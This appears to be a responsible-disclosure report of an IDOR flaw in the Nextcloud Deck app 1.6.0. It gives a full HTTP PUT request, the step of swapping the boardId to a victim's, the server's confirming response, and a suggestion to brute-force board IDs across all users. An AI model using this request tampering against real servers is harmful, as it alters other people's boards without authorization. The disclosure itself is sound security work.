Hi everyone,
Hope you are well !
I found an IDOR vulnerability, allowing any user without privilege to add lists with tasks in any user board.
This was tested on a Nextcloud Hub II server (v23) with the Deck application in version 1.6.0.
Beforehand:
boardId
parameter)boardId
parameter)1°) With your user A, rename an existing list belonging to him.
The following PUT request is made :
PUT /apps/deck/stacks/31 HTTP/1.1
Host: nextcloud.yourserver.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken: <token>
Content-Length: 136
Origin: https://nextcloud.yourserver.com
Connection: close
Cookie: <your_session_cookies>
{"title":"IDOR","boardId":14,"deletedAt":0,"lastModified":1642201857,"order":0,"id":31,"ETag":"a5f7e3ab477ee2a2259f0889a63130a8"}
Intercept the request, change the boardId
parameter to that of your victim (user B) and play the modified request…
Check the server response that confirms the vulnerability:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 23:39:49 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 135
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'
Feature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'
X-Robots-Tag: none
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Strict-Transport-Security: max-age=31536000; includeSubDomains;
{"title":"IDOR_REPORT","boardId":1,"deletedAt":0,"lastModified":1642201857,"order":0,"id":31,"ETag":"a5f7e3ab477ee2a2259f0889a63130a8"}
2°) With your user B, go to the board in question and notice the addition of a new list with tasks without his knowledge
Additional Notes:
Broken Access Control - IDOR : The impact here is to be able to add lists with tasks on the board of any user and harm them.
We could imagine here brute-forcing the boardId
parameter starting from 1 to 1000 (for example) to exploit this vulnerability on all the existing users/tables. We could also create on our victim an incalculable number of lists on his board.
Looking forward to exchanging.
Regards,
Supras